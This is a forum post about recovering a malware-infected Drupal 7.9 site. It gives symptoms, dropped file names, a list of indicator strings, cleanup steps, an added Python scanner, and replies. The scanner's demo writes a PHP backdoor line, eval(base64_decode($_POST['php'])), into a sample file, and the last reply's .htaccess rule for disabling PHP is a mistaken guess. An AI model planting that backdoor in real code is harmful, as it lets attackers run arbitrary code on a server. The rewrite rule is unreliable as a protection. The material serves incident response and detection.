Hi to all,
I want to tell you about the malware attack on my Drupal website, not just to get your suggestions but also to create something helpful for anybody who could suffer from the same problems. Well...
INITIAL SETUP
- Drupal 7.9
- Activated modules:
>>> CORE: Block, Contextual links, Database logging, Field, Field SQL storage, Field UI, File, Filter, Image, List, Locale, Menu, Node, Number, Options, Overlay, Path, PHP Filter, RDF, System, Taxonomy, Text, Toolbar, User
>>> CCK: Multiselect
>>> CHAOS TOOL SUITE: Chaos tools
>>> DATE/TIME: Calendar, Date, Date API, Date Popup, Date views
>>> FIELDS: Email, Field permission, Link
>>> OTHER: Google Plus One +1, Pathauto, Token, Weight
>>> SHARING: Share this, Share this block
>>> TAXONOMY MENU: Taxonomy menu
>>> VIEWS: Views, Views PDF Display, Views PHP, Views UI
>>> OTHER MODULES THAT I REMOVED: CKEDITOR, VIEWS_SLIDESHOW, IMCE, DOMPDF, PRINT, WYSIWYG
MY SETUP ERRORS
- In order to satisfy the customer, I modified some of the modules and I never updated them (OUCH!)
- The customer was in possession of the login data, and maybe his computer wasn't safe (MMM...)
- I didn't have a copy of the website, because I trusted the provider's weekly backup (DOH!)
ATTACK EXTERNAL SYMPTOMS
- All the links on the homepage redirected to a malware website
- Google blacklisted the website
- Critical alert on the Google Webmaster Tools panel
FTP SYMPTOMS
- Lots of "strange" files: mainma3.php (I found this one in every folder!), functoins.php, sum75.html, wlc.html, aol.zip, chase.zip, chaseverification.zip, 501830549263.php, wp-conf.php and a dozen wtmXXXXn.php (where X = a number) in the root folder. All these files were full of malicious functions (unescape, base64_decode, eval, etc.)
- install.php was modified with a long line of malicious code
- This line of code was appended to EVERY javascript file:
;document.write('');
- The weekly backup was also infected
- Dozens of repeated "strange" requests, found in the Drupal log panel (my domain is obscured with the string "-----"):
>>> index.php?q=ckeditor/xss > Notice: Undefined offset: 5 in eval() (linea 29 di /web/htdocs/-----/home/modules/php/php.module(74) : eval()'d code(1) : eval()'d code).
>>> http://-----/user?destination=node/add > Failed login by shadowke
>>> calendar/week/2012-W19?year=2011&mini=2012-12 > page not found
>>> misc/]};P.optgroup=P.option;P.tbody=P.tfoot=P.colgroup=P.caption=P.thead;P.th=P.td;if(!c.support.htmlSerialize)P._default=[1, > page not found
>>> misc/)h.html(f?c( > page not found
>>> mail.htm > page not found
RECOVERY [Thanks to this article: http://25yearsofprogramming.com/blog/20070705.htm]
1) I've put the website in Maintenance mode (error503.php + .htaccess). Traffic open just for my IP address
[see this useful guide: http://25yearsofprogramming.com/blog/20070704.htm]
2) I've downloaded the whole website locally
3) I've searched for and removed the strange files > I found forty of them
4) I've searched the files for these words [with the freeware AGENT RANSACK]: eval(base64_decode($_POST["php"])), eval(, eval (, base64_, document.write, iframe, unescape, var div_colors, var _0x, CoreLibrariesHandler, pingnow, serchbot, km0ae9gr6m, c3284d, upd.php, *timthumb*. > I've acted in one of the following ways: a) I've replaced eval with php_eval() (Drupal's safe version of eval); b) I've written down the suspected modules; c) I've compared the code with the freshly downloaded module; d) I've removed all the malicious code (see the javascript mentioned above)
5) I've searched for changes in the file system [with the freeware WINMERGE]
6) I've identified some suspected modules, thanks to the list written at point 4 above, and thanks to some research on Google (name_of_the_module security issue, name_of_the_module hacked, etc...) and on Secunia [http://secunia.com/community/advisories/search]
7) I've scanned my computer (Avast, Search&Destroy, Malwarebytes Antimalware) > I didn't find any virus or spyware
8) I've changed all the logins (FTP, cPanel, Drupal admin panel)
9) I've reloaded the whole website
10) I've removed all the suspected modules: CKEDITOR, VIEWS_SLIDESHOW, PRINT, DOMPDF, IMCE, CAPTCHA, WYSIWYG, WEBFORM.
11) I've told the whole story to the provider's support
12) I've asked Google for a review (they did it in 12 hours)
DRUPAL LOG NOW
dozens of these messages:
>>> wtm4698n.php?showimg=1&cookies=1 > page not found
>>> fhd42i3d.html > page not found
>>> wp-conf.php?t2471n=1 > page not found
>>> http://-----/user?destination=node/add > Failed login by Elovogue
LESSONS LEARNED
- Never touch the modules, so you can update them
- Keep all the logins on a safe computer / Use a safe computer to work on the FTP
- Search for any security issue before installing a module
- Keep a clean copy of the website somewhere
MY QUESTIONS:
- What kind of attack have I received?
- Are there other unsafe modules in my installation?
- What else can I do?
Thanks to everybody for your patience!
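An added example (not code from the post, and not Drupal's own) that automates steps 4 and 5 of the recovery described above: it searches a web root for the indicator strings listed in step 4, flags the `;document.write(` line appended to every .js file, lists dropped files by the names seen in the FTP symptoms and PHP files sitting in the upload directory, and diffs the tree against a clean copy (the WinMerge step) so that legitimate hits, such as Drupal core's own eval() inside php.module, drop out of the review list. The upload path sites/default/files is assumed (Drupal 7's default); every sample file in build_demo() is constructed for the demo.

```python
# Added example (not code from the post or from Drupal). It automates steps 4 and
# 5 of the recovery above: searches a web root for the poster's indicator strings,
# flags the ";document.write(" line appended to .js files, lists dropped files by
# name and PHP files in the upload directory, and diffs the tree against a clean
# copy so that legitimate hits (Drupal's own eval() in php.module) drop out.
import hashlib
import re
import shutil
import tempfile
from pathlib import Path

# Indicator strings from the post, matched as case-sensitive substrings.
INDICATORS = ['eval(base64_decode($_POST["php"])', "eval(", "eval (", "base64_",
              "document.write", "iframe", "unescape", "var div_colors", "var _0x",
              "CoreLibrariesHandler", "pingnow", "serchbot", "km0ae9gr6m", "c3284d",
              "upd.php", "timthumb"]
# File names the poster found dropped into the tree (wtmXXXXn.php, X = digit).
DROPPED_NAME_RE = re.compile(r"^(mainma3|functoins|wp-conf|wtm\d+n|\d{12})\.php$")
SCAN_SUFFIXES = {".php", ".inc", ".module", ".js", ".html", ".htm"}
UPLOAD_DIR = "sites/default/files"  # assumed: Drupal 7's default public files path

def walk(root):
    """Yield (relative POSIX path, Path) for every regular file under root, sorted."""
    root = Path(root)
    for p in sorted(root.rglob("*")):
        if p.is_file():
            yield p.relative_to(root).as_posix(), p

def find_indicators(root):
    """Map relative path -> indicator strings found in each scannable text file."""
    hits = {}
    for rel, p in walk(root):
        if p.suffix in SCAN_SUFFIXES:
            text = p.read_text(encoding="utf-8", errors="replace")
            found = [s for s in INDICATORS if s in text]
            if found:
                hits[rel] = found
    return hits

def find_appended_js(root):
    """Return .js files whose last non-empty line starts with ';document.write('."""
    out = []
    for rel, p in walk(root):
        if p.suffix == ".js":
            lines = [l for l in p.read_text(errors="replace").splitlines() if l.strip()]
            if lines and lines[-1].lstrip().startswith(";document.write("):
                out.append(rel)
    return out

def find_dropped_names(root):
    """Return files whose name matches the dropped-file patterns from the post."""
    return [rel for rel, p in walk(root) if DROPPED_NAME_RE.match(p.name)]

def find_php_in_upload_dir(root, upload_dir=UPLOAD_DIR):
    """PHP files under the writable upload directory have no business being there."""
    return [rel for rel, p in walk(root) if rel.startswith(upload_dir + "/") and p.suffix == ".php"]

def diff_against_clean(clean_root, suspect_root):
    """Return (added, modified, removed) relative paths, comparing SHA-256 digests."""
    digests = lambda r: {rel: hashlib.sha256(p.read_bytes()).hexdigest() for rel, p in walk(r)}
    clean, suspect = digests(clean_root), digests(suspect_root)
    added = sorted(set(suspect) - set(clean))
    removed = sorted(set(clean) - set(suspect))
    modified = sorted(r for r in clean if r in suspect and clean[r] != suspect[r])
    return added, modified, removed

def files_to_review(clean_root, suspect_root):
    """Everything new, changed, oddly named, appended-to, or PHP in the upload dir.
    Indicator hits in files identical to the clean copy are deliberately dropped."""
    added, modified, _ = diff_against_clean(clean_root, suspect_root)
    review = set(added) | set(modified) | set(find_dropped_names(suspect_root))
    review |= set(find_php_in_upload_dir(suspect_root)) | set(find_appended_js(suspect_root))
    return sorted(review)

def build_demo():
    """Construct a clean tree and an infected copy showing the post's symptoms."""
    base = Path(tempfile.mkdtemp(prefix="drupal-scan-"))
    clean, infected = base / "clean", base / "infected"
    files = {
        "install.php": "<?php\n// installer\n",
        "misc/drupal.js": "(function ($) { Drupal.behaviors = {}; })(jQuery);\n",
        # Drupal's PHP filter legitimately calls eval(): a hit, but an unchanged file.
        "modules/php/php.module": "<?php\nfunction php_eval($code) {\n  return eval('?>' . $code);\n}\n",
        "sites/default/files/.htaccess": "Options None\n",  # constructed stand-in
    }
    for rel, body in files.items():
        (clean / rel).parent.mkdir(parents=True, exist_ok=True)
        (clean / rel).write_text(body)
    shutil.copytree(clean, infected)
    # Symptoms from the post: backdoor line in install.php, line appended to the .js
    # file (payload stripped, as in the post), dropped files in several folders.
    with open(infected / "install.php", "a") as f:
        f.write('eval(base64_decode($_POST["php"]));\n')
    with open(infected / "misc/drupal.js", "a") as f:
        f.write(";document.write('');\n")
    for rel in ("mainma3.php", "modules/mainma3.php"):
        (infected / rel).write_text("<?php eval(unescape(...)); ?>\n")  # constructed text
    (infected / "sites/default/files/wtm4698n.php").write_text("<?php /* dropped */ ?>\n")
    return str(clean), str(infected)

if __name__ == "__main__":
    clean, infected = build_demo()
    print("review:", files_to_review(clean, infected))
```

Run against a real tree, pass the local download as the suspect root and a freshly unpacked Drupal plus fresh module downloads as the clean copy; anything the clean copy does not contain byte for byte goes on the review list, which is exactly the comparison the post does by hand with WinMerge. The upload-directory check matters because that directory must be writable by the web server: Drupal 7 writes an .htaccess into it that turns the PHP engine off, so a .php file found there is both a sign of compromise and a sign that protection is missing.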
Comments
I'm sorry I can't offer much
I'm sorry I can't offer much help with your problem / issue, but I can give you one suggestion. Do you think they were able to breach your site due to its version? There have been several "security" updates since 7.9
Thank you the same
Hi Tlommy,
Thank you the same for your answer and empathy.
Yes, I think the main problem is with updating! Unfortunately I'm really afraid that I would have to "destroy" the whole site to upgrade everything. I think it is better to solve the problem now and rebuild the website more wisely in a few years
I believe the problem was
I believe the problem was with vulnerable code and file permissions that allowed the server to write files. Once someone found the vulnerable file (TimThumb has been one in the past) then it was just a matter of uploading a backdoor shell (one of those weird, obfuscated files you saw) and then they had full control of the site.
Don't let the server write to files and directories but if you have to, then deactivate php for that directory.
How to "deactivate php"?
Thank you Plaverty,
I think your idea could be right (the alternative is that malware stole the login password from my customer's computer).
How can I "deactivate php"? In the .htaccess file? Maybe something like this?
RewriteEngine on
RewriteRule !(\.(php))$ index.php